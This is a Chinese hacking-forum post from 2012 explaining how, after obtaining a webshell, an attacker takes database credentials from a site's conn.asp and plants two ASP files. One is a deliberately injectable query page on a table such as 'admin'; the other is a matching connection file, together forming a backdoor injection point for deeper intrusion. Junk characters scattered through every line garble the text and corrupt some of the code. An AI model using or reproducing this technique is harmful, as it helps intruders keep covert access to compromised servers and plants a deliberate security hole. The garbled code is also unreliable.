找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1862|回复: 0
打印 上一主题 下一主题

自己构造注入点方便入侵

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:27:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
自己构造注入点方便入侵
$ E/ s7 R9 {9 r# m& n$ g
% F! T( Q6 T8 w; H4 p3 L" s今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息
* R  S1 V2 D' s% v4 C$ ]8 J7 U+ n7 U9 E
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
9 q9 W& z# w* a, j, f) A4 x  s$ R* Y3 x6 S0 H
首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
6 i4 [+ I: e2 u, S' \" B/ c' |1 H9 |, D+ }
密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
$ g; z, P2 b5 |# e! w5 k  W; i+ i; z  d+ G: u
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:  @8 L) j$ g! i) U6 f; s
1 K9 V: u; H$ s1 b& F. o3 K
程序代码
) b% X& C( v9 z: v. @' q<!--#include file="xx.asp"-->$ L0 m3 u1 [4 D0 j( b6 I8 Q
<%
* t/ i7 i+ ?* p3 t( a+ A( ?) U+ iset rs=server.createobject("ADODB.recordset")
  B4 B# M/ K6 Y2 P7 j) Hid = request("id")
+ B8 O& e. X- A2 cstrSQL = "select * from admin where id=" & id
# C9 v2 E; s9 J' d: ~( C: K/ ors.open strSQL,conn,1,3
& X5 L7 ~  t+ |5 k2 brs.close8 b) Z5 n' r6 F/ v
%>- z' X/ v2 r9 J/ `* _; h

0 o9 T# o9 W5 t, X. A把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在; L* ~/ o* |1 C
  ^4 z! r( T& r2 [# I7 V, b( j9 Q
你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!' ?8 h- k7 b% X
  [) b8 e% Y1 Q
然后就要构造一个连接数据库的文件了,代码如下:
& O2 f, I( P" n: m0 m9 k程序代码
7 N8 r1 \3 |& a$ R- i! H! Y; _<%        ( ?9 p# v% y. f* |1 U. `
strSQLServerName = "000.000.000.000"     '服务器名称或地址
6 |- g: z$ j  v3 m; fstrSQLDBUserName = "sqlname"         '数据库帐号* K9 O7 X; g8 P" l$ N* i3 C
strSQLDBPassword = "sqlpass"         '数据库密码
8 s0 l- S) Y+ V0 KstrSQLDBName = "sqldataname"           '数据库名称* p- M; Q- |' @+ j& L6 I
Set conn = Server.CreateObject("ADODB.Connection")
) W, v! s+ m* g% d$ M7 x1 |  ystrCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
2 v9 U2 e, R4 ^! _" s6 }conn.open strCon
+ F" w/ v0 A8 H. u7 k%>
$ r+ b* ~" ]9 v2 P* u/ R+ z; w3 Q& b: }' Z- U4 A8 V# N
这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,
' y* K7 K; ^$ ^- z
5 E# \6 {& @4 b就这样,正常情况下,就OK了,伪造成功……
5 T2 y* d0 y" ~2 A: S' g: n. v1 P8 H, i
           如果有什么问题可以提出来大家一起探讨解决。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表